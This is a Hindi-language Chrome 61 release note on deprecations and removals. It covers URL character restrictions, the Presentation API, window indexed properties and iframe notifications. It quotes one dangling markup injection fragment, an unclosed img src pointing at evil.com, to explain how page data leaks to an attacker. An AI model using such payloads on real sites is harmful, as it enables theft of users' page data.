हमें Chrome के करीब-करीब सभी वर्शन में, प्रॉडक्ट, उसकी परफ़ॉर्मेंस, और वेब प्लैटफ़ॉर्म की सुविधाओं के बारे में काफ़ी अपडेट और सुधार दिखते हैं. इस लेख में Chrome 61 में, इस सुविधा के बंद होने और उसे हटाने के बारे में जानकारी दी गई है. Chrome 61 का बीटा वर्शन 3 अगस्त से उपलब्ध है. इस सूची में किसी भी समय बदलाव किया जा सकता है.
सुरक्षा और निजता
उन संसाधनों को ब्लॉक करें जिनके यूआरएल में '\n' और '<' वर्ण हों
डैंगलिंग मार्कअप इंजेक्शन एक तरह की हैकिंग होती है, जिसमें बाहरी एंडपॉइंट पर डेटा भेजने के लिए, काटे गए यूआरएल का इस्तेमाल किया जाता है. उदाहरण के लिए,
कोई ऐसा पेज देखें जिसमें <img src='https://evil.com/?
हो. यूआरएल में
क्लोज़िंग कोट नहीं है. इसलिए, ब्राउज़र होने वाले अगले कोटेशन को पढ़ेंगे और उसमें शामिल वर्णों को एक ही यूआरएल के तौर पर ट्रीट करेंगे.
Chrome 61, href
और src
एट्रिब्यूट में अनुमति वाले वर्ण सेट को सीमित करके, जोखिम की इस आशंका को कम करता है. खास तौर पर, Chrome
को नए लाइन वर्ण (\n
) और वर्ण (<
) से कम वर्ण (<
) मिलने पर यूआरएल को प्रोसेस करना बंद कर देगा.
जिन डेवलपर के पास नई लाइन के लिए सही इस्तेमाल का उदाहरण है और जो यूआरएल में उससे कम वर्ण इस्तेमाल करते हैं उन्हें इन वर्णों को एस्केप करना चाहिए.
हटाएं | Chromestatus Tracker | Chromium की गड़बड़ी
असुरक्षित कॉन्टेक्स्ट पर, प्रज़ेंटेशन एपीआई को बंद करें और हटाएं
यह पता चला है कि असुरक्षित ऑरिजिन पर, प्रज़ेंटेशन एपीआई का इस्तेमाल असुरक्षित ऑरिजिन पर, हैकिंग वेक्टर के तौर पर किया जा सकता है. डिसप्ले में पता बार नहीं होते हैं. एपीआई का इस्तेमाल, कॉन्टेंट की नकल करने के लिए किया जा सकता है. आपकी स्क्रीन पर चलने वाले प्रज़ेंटेशन से भी डेटा बाहर निकाला जा सकता है.
Blink के असुरक्षित ऑरिजिन पर मौजूद दमदार सुविधाओं को हटाने के मकसद को ध्यान में रखते हुए, हम असुरक्षित कॉन्टेक्स्ट पर प्रज़ेंटेशन एपीआई के लिए सहायता
को बंद करने और उसे हटाने की योजना बना रहे हैं. Chrome
61 से, PresentationRequest.start()
असुरक्षित ऑरिजिन पर काम नहीं करेगा.
हटाएं | Chromestatus Tracker | Chromium की गड़बड़ी
JavaScript
Windows पर इंडेक्स की गई प्रॉपर्टी के बारे में जानकारी देने की अनुमति न दें
पहले कुछ ब्राउज़र में JavaScript असाइनमेंट के लिए अनुमति थी, जैसे कि:
window[0] = 1;
मौजूदा एचटीएमएल स्पेसिफ़िकेशन में बताया गया है कि यह JavaScript की खास जानकारी का साफ़ तौर पर उल्लंघन करता है. इसलिए, इस सुविधा को Chrome 61 से हटा दिया गया है. फ़रवरी 2016 तक, Firefox पहले से ही अनुपालन में है.
असुरक्षित iframe से सूचनाओं के इस्तेमाल को हटाएं
iframes की अनुमति के अनुरोध से उपयोगकर्ता भ्रम में पड़ सकते हैं, क्योंकि इसमें शामिल पेज की शुरुआत की जगह और अनुरोध करने वाले iframe के ऑरिजिन के बीच अंतर करना मुश्किल होता है. अनुरोधों का दायरा साफ़ न होने पर, उपयोगकर्ताओं के लिए यह तय करना मुश्किल हो जाता है कि वे अनुमति दें या अस्वीकार करें.
iframe में सूचनाओं को अनुमति न देने से, सूचना की अनुमति की ज़रूरी शर्तों को भी पुश नोटिफ़िकेशन की शर्तों के साथ अलाइन किया जाएगा. इससे डेवलपर को आने वाली परेशानियों को कम करने में मदद मिलेगी.
जिन डेवलपर को इस सुविधा की ज़रूरत है वे सूचना की अनुमति का अनुरोध करने के लिए, एक नई विंडो खोल सकते हैं.